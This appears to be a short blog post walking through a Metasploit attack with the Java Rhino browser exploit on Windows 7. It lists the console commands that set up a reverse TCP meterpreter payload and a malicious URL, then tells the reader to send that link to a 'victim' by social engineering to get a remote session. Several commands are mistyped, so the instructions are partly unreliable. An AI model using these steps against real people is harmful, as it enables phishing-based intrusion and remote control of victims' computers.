Browser exploit series (1) JAVA Rhino exploit
Today we are going to pawn windows 7 with a java exploit called: JAVA RHINO Exploit. Here i quote from the Armitage console's description of the exploit:" This module exploits a vulnerability in the Rhinio Script Engine that can be used by Java Applet to run an arbitrary code outside of the sandbox" The vulnerability affects version 7 and earlier versions, and should work on any browser: firefox, safari, internet explorer, google chrome etc...
First of all, you have to update the metasploit svn by the custom command #msfupdate#, to make sure that the above exploit is included in your Backtrack exploits database. Then run:
ccmsfconsole
Then type this command:
#use exploit/multi/browser/java_rhino
Then again, this command:
#set payload/java/meterpreter/reverse/tcp
At this level, type these commands, the first one is meant to set up the server:
#set srvhost 192.168.1.6
In this case: 192.168.1.6 is my internal ip, you have to change this value with your own ip. If you don't know how to get your ip address, just open a ternimal and type: #if config.The next command will define the port of the server which is usually port 80.
#set srvport 80
Next command is for setting up the path of the exploit:
#set uripath java_rhino
# set lhost 192.168.1.6
#set lport 443
Notice also that the srvhost & the lhost have the same ip address. Finally, type this command and wait for a connection:
#exploit
As you may notice here, a link has been generated for you: Local IP://192.168.1.6:80/java_rhino, you have to copy the link and send it to your victim. Once you succeed in "social engineering" the link to a victim, the sending stage starts, and you'll have a java meterpreter session.
0 commentaires: